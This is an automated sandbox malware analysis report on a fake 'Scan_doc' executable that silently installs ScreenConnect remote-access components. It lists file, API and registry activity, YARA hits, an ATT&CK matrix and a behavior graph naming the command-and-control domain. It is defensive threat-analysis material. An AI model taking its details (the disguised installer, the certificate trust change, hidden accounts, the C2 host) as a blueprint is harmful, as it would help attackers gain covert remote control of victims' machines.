                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B873642 CreateNamedPipeW,12_2_00007FFD9B873642
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005E1806
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeCode function: 11_2_01CE4C62 RtlGetVersion,11_2_01CE4C62
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.100000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7416, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7452, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts
                  31
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory1
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter
                  1
                  Valid Accounts
                  1
                  Valid Accounts
                  1
                  Install Root Certificate
                  Security Account Manager66
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job
                  2
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  Timestomp
                  NTDS71
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Scheduled Task/Job
                  2
                  Windows Service
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                  Bootkit
                  13
                  Process Injection
                  1
                  DLL Search Order Hijacking
                  Cached Domain Credentials71
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Scheduled Task/Job
                  111
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd71
                  Virtualization/Sandbox Evasion
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                  Process Injection
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Hidden Users
                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                  Bootkit
                  Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523875 Sample: Scan_doc_09_16_24_1203.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 66 48 ttyuio.zapto.org 2->48 50 cloudfiles-secure.io 2->50 52 2 other IPs or domains 2->52 58 Suricata IDS alerts for network traffic 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 .NET source code references suspicious native API functions 2->62 64 3 other signatures 2->64 9 ScreenConnect.ClientService.exe 2->9         started        12 Scan_doc_09_16_24_1203.exe 2 2->12         started        14 svchost.exe 8 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 74 Reads the Security eventlog 9->74 76 Reads the System eventlog 9->76 19 ScreenConnect.WindowsClient.exe 9->19         started        22 ScreenConnect.WindowsClient.exe 9->22         started        24 dfsvc.exe 133 109 12->24         started        28 WerFault.exe 21 16 12->28         started        30 WerFault.exe 2 14->30         started        46 127.0.0.1 unknown unknown 16->46 signatures6 process7 dnsIp8 66 Creates files in the system32 config directory 19->66 68 Contains functionality to hide user accounts 19->68 54 ttyuio.zapto.org 178.215.236.119, 443, 49731, 49735 LVLT-10753US Germany 24->54 38 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 24->38 dropped 40 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 24->40 dropped 42 ScreenConnect.WindowsBackstageShell.exe, PE32 24->42 dropped 44 13 other files (none is malicious) 24->44 dropped 32 ScreenConnect.WindowsClient.exe 19 11 24->32         started        file9 signatures10 process11 signatures12 56 Contains functionality to hide user accounts 32->56 35 ScreenConnect.ClientService.exe 32->35         started        process13 signatures14 70 Contains functionality to hide user accounts 35->70 72 Enables network access during safeboot for specific services 35->72

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Scan_doc_09_16_24_1203.exe16%ReversingLabs
                  Scan_doc_09_16_24_1203.exe14%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe0%ReversingLabs
